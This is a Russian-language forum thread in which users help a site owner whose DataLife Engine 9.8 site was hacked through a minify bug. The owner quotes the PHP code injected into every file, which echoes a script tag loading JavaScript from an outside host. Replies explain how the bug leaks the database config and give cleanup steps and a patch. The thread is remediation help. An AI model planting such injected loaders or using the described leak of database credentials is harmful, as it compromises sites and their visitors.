Помощь Взлом

[Forza.Baron]

Взламывают сайт. 9.8 дле, применил баг минифи...
На все php файлы в конец добавляется такой код:

<?php
#aab978#
if(empty($qdf)) {
$qdf = "<script type=\"text/javascript\" src=\"http://foschicago.com/lymvwdxf.php?id=804701\"></script>";
echo $qdf;
}
#/aab978#
?>

#aab978# - на всех файлах разный...

Кто сталкивалься таким "взлом"ом? Как найти и удалить "вирус"...?

 

[Горбушка]

Версии 10.0 и ниже - уязвимы!

Я наверное блокер напишу, который блочит nulled до тех пор, пока человек не напишет 100 раз "Я буду обновлять DLE до безопасных версий... Я больше не буду некрофилом!"

Удаляем все файлы, ставим поверх DLE 10.5 (10.4), восстанавливает вложения, обновляем шаблон - радуемся жизни...

Ну а если тупо вырезать - notepad++ в помощь. Ctrl+f -> поиск по файлам, заменить вот эту херню на пусто... Ну и бросаем в атаку на папку сайта... Только вирус на 9.8 вернётся через сутки...

 

[gusewww]

Из-за уязвимости хакеры могли получать доступ к базе данных и в дальнейшем производить с ней любые действия.

С помощью определенных действий хакер может отправить в кеш файл /engine/data/dbconfig.php, в котором хранятся имя БД, пользователь и пароль для подключения к базе данных вашего сайта. После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, цифры в конце названия могут быть любыми. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.

Для закрытия уязвимости:

Откройте файл: /engine/classes/min/index.php и в самое начало файла после строчки:

<?php
добавьте:

if(isset($_GET['f'])){
$_GET['f']= str_replace(chr(0),'',(string)$_GET['f']);}

Мне вот интересно, если подключиться к базе можно только из локалки, как они к ней могут подключиться без доступа к файлам.
Как вариант припарковать домен на тот же сервер, есть еще варианты?

 

[Горбушка]

есть еще варианты?

Легко, Для просмотра ссылки Войди или Зарегистрируйся